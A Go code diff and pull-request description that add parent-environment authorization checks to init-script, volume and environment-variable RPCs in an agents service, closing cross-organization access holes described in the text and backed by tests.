@@ -1501,6 +1592,9 @@ func (s *Server) ListInitScripts(ctx context.Context, req *agentsv1.ListInitScri
 		if err != nil {
 			return nil, status.Errorf(codes.InvalidArgument, "agent_id: %v", err)
 		}
+		if err := s.requireConfigRead(ctx, &agentID, nil, nil); err != nil {
+			return nil, err
+		}
 		filter.AgentID = &agentID
 	}
 	if req.GetMcpId() != "" {
@@ -1508,6 +1602,9 @@ func (s *Server) ListInitScripts(ctx context.Context, req *agentsv1.ListInitScri
 		mcpID, err := parseUUID(req.GetMcpId())
 		if err != nil {
 			return nil, status.Errorf(codes.InvalidArgument, "mcp_id: %v", err)
+		}
+		if err := s.requireConfigRead(ctx, nil, &mcpID, nil); err != nil {
+			return nil, err
 		}
 		filter.McpID = &mcpID
 	}

--- a/internal/server/volumes.go
+++ b/internal/server/volumes.go
@@ -55,19 +55,6 @@ func resolveVolumeSize(size string, persistent bool) (*string, bool, error) {
 	return &trimmed, true, nil
 }
 
-// requireVolumeWrite authorizes changing a volume through the target that owns
-// it. A volume carries no tuples of its own.
-func (s *Server) requireVolumeWrite(ctx context.Context, volume store.Volume) error {
-	if volume.EnvironmentID != nil {
-		environment, err := s.store.GetEnvironment(ctx, *volume.EnvironmentID)
-		if err != nil {
-			return toStatusError(err)
-		}
-		return s.requireEnvironmentWrite(ctx, environment)
-	}
-	return nil
-}
-
 // ListVolumeAttachments serves orchestrators released before volumes moved onto
 // environments. An agent's attachments are its environment's volumes and an
 // MCP's are its own, so an old orchestrator mounts the same volumes a new one
@@ -83,6 +70,11 @@ func (s *Server) ListVolumeAttachments(ctx context.Context, req *agentsv1.ListVo
 		agent, err := s.store.GetAgent(ctx, agentID)
 		if err != nil {
 			return nil, toStatusError(err)
+		}
+		// Before the early return: an agent in no environment would otherwise
+		// answer an unauthorized caller, which tells it the agent exists.
+		if err := s.requireConfigRead(ctx, &agentID, nil, nil); err != nil {
+			return nil, err
 		}
 		if agent.EnvironmentID == nil {
 			return &agentsv1.ListVolumeAttachmentsResponse{}, nil
@@ -104,6 +96,9 @@ func (s *Server) ListVolumeAttachments(ctx context.Context, req *agentsv1.ListVo
 		mcp, err := s.store.GetMcp(ctx, mcpID)
 		if err != nil {
 			return nil, toStatusError(err)
+		}
+		if err := s.requireConfigRead(ctx, mcp.AgentID, nil, mcp.EnvironmentID); err != nil {
+			return nil, err
 		}
 		result, err := s.store.ListVolumes(ctx, mcp.OrganizationID, store.VolumeFilter{McpID: &mcpID}, 0, nil)
 		if err != nil {

--- a/internal/store/agent_helpers.go
+++ b/internal/store/agent_helpers.go
@@ -130,4 +130,3 @@ func agentIDForMcp(ctx context.Context, tx pgx.Tx, mcpID uuid.UUID) (uuid.UUID, 
 	}
 	return agentID, nil
 }
-

--- a/internal/store/sandbox.go
+++ b/internal/store/sandbox.go
@@ -29,7 +29,7 @@ func (s *Store) CreateEnvironment(ctx context.Context, organizationID uuid.UUID,
 		input.AgentRuntimeImageTag,
 		input.Availability,
 		input.LLMMode,
-		input.LLMAllowedModels,
+		nonNilStrings(input.LLMAllowedModels),
 	)
 	environment, err := scanEnvironment(row)
 	if err != nil {

--- a/internal/store/store.go
+++ b/internal/store/store.go
@@ -1122,11 +1122,7 @@ func (s *Store) CreateInitScript(ctx context.Context, organizationID uuid.UUID, 
 			}
 			return InitScript{}, err
 		}
-		agentID, err := resolveAgentID(ctx, tx, script.AgentID, script.McpID)
-		if err != nil {
-			return InitScript{}, err
-		}
-		if err := touchAgentUpdatedAt(ctx, tx, agentID); err != nil {
+		if err := touchTargetAgent(ctx, tx, script.AgentID, script.McpID, script.EnvironmentID); err != nil {
 			return InitScript{}, err
 		}
 		return script, nil
@@ -1170,11 +1166,7 @@ func (s *Store) UpdateInitScript(ctx context.Context, id uuid.UUID, update InitS
 			}
 			return InitScript{}, err
 		}
-		agentID, err := resolveAgentID(ctx, tx, script.AgentID, script.McpID)
-		if err != nil {
-			return InitScript{}, err
-		}
-		if err := touchAgentUpdatedAt(ctx, tx, agentID); err != nil {
+		if err := touchTargetAgent(ctx, tx, script.AgentID, script.McpID, script.EnvironmentID); err != nil {
 			return InitScript{}, err
 		}
 		return script, nil
@@ -1194,11 +1186,7 @@ func (s *Store) DeleteInitScript(ctx context.Context, id uuid.UUID) error {
 			}
 			return struct{}{}, err
 		}
-		agentID, err := resolveAgentID(ctx, tx, script.AgentID, script.McpID)
-		if err != nil {
-			return struct{}{}, err
-		}
-		if err := touchAgentUpdatedAt(ctx, tx, agentID); err != nil {
+		if err := touchTargetAgent(ctx, tx, script.AgentID, script.McpID, script.EnvironmentID); err != nil {
 			return struct{}{}, err
 		}
 		return struct{}{}, nil
@@ -1214,6 +1202,9 @@ func (s *Store) ListInitScripts(ctx context.Context, filter InitScriptFilter, pa
 	}
 	if filter.McpID != nil {
 		clauses, args = appendClause(clauses, args, "mcp_id = $%d", *filter.McpID)
+	}
+	if filter.EnvironmentID != nil {
+		clauses, args = appendClause(clauses, args, "environment_id = $%d", *filter.EnvironmentID)
 	}
 
 	scripts, nextCursor, err := listEntities(ctx, s.pool,


### PR DESCRIPTION
Closes the sub-resource half of the authorization audit. **Stacked on #93** — its `touchTargetAgent` fix is what makes an environment-scoped init script writable at all, so these tests cannot run without it. Review #93 first.

## What was open

The spec is unambiguous: *"Volumes, MCPs, init scripts, and ENVs owned by an environment carry no tuples of their own — they are gated by `can_read_config` / `can_edit_config` on the parent environment"*, and the Agents Service table gives Create/Update/Delete `can_edit_config` and Get/List `can_read_config`.

Only the branches that happened to name an *environment* checked anything. Every other path went straight to the store by id, with no organization predicate anywhere:

- `GetEnv` returns the plaintext `value` — any authenticated identity could read any organization's ENV by uuid.
- `UpdateInitScript` rewrites a shell script the workload runs. That is code execution in another organization's agent, given a uuid.
- `CreateEnv` checked nothing on any of its three branches.
- `requireVolumeWrite` returned `nil` for MCP-scoped volumes, so even the one write helper that existed had a hole.

## The shape

`requireConfigRead` / `requireConfigWrite` take the three target pointers in the order `publishAgentUpdatedForConfigTarget` already reads them, so a row and its notification always pick the same parent. An MCP is itself a sub-resource, so an MCP target resolves on to the MCP's own parent.

- **read** serves an absent identity — the Orchestrator assembles workloads over the mesh holding no tuples, and `agent.can_read_config` includes `instance`, `environment.can_read_config` includes `instance from agent`, so a running workload still reads its own config.
- **write** refuses an absent identity; these RPCs have no internal caller.
- `resolveConfigParent` fails closed. `envs` lost its target CHECK when `hook_id` was dropped in 0022, so a row naming no parent is reachable and there is nothing to authorize it against.

`requireVolumeWrite` is deleted — `requireConfigWrite` supersedes it on both arms.

## Verification

Against a real Postgres. Every new test fails with the checks reverted and passes with them:

    --- FAIL: TestSubResourceWritesRefuseACallerWithoutTheParent/UpdateInitScript
    --- FAIL: TestSubResourceWritesRefuseACallerWithoutTheParent/DeleteEnv
    --- FAIL: TestSubResourceReadsRefuseACallerWithoutTheParent/GetEnv
    --- FAIL: TestSubResourceWritesRefuseAnInternalCaller
    --- FAIL: TestSubResourceWriteChecksTheParent

`TestSubResourceWriteChecksTheParent` asserts the object is `environment:<id>`, not the organization the row also carries — org membership is strictly weaker than `can_edit_config`, and the existing `noopAuthorizationWriter` allows every check, so nothing could previously catch a wrong relation or object.

`TestEnvListFilterNarrowsByEveryTarget` loses its mcp target: resolving an MCP's parent needs a store, and that branch is covered by the database tests instead.

## Deliberately not in this PR

The organization-only `ListEnvs` path still returns every ENV in an organization to any member, environment-owned rows included, bypassing the `can_read_config` gate the environment branch enforces. It is intra-organization rather than cross-tenant, and `TestEnvListFilterScopesAnUnfilteredListToTheOrganization` plus an e2e comment encode it as intended. It needs a decision, not a patch.

Agent-level RPCs (`GetAgent`, `DeleteAgent`, `RemoveAgentRole`, `ListAgentRoles`, and `CreateAgent`/`UpdateAgent`, which check nothing at all) are the next PR.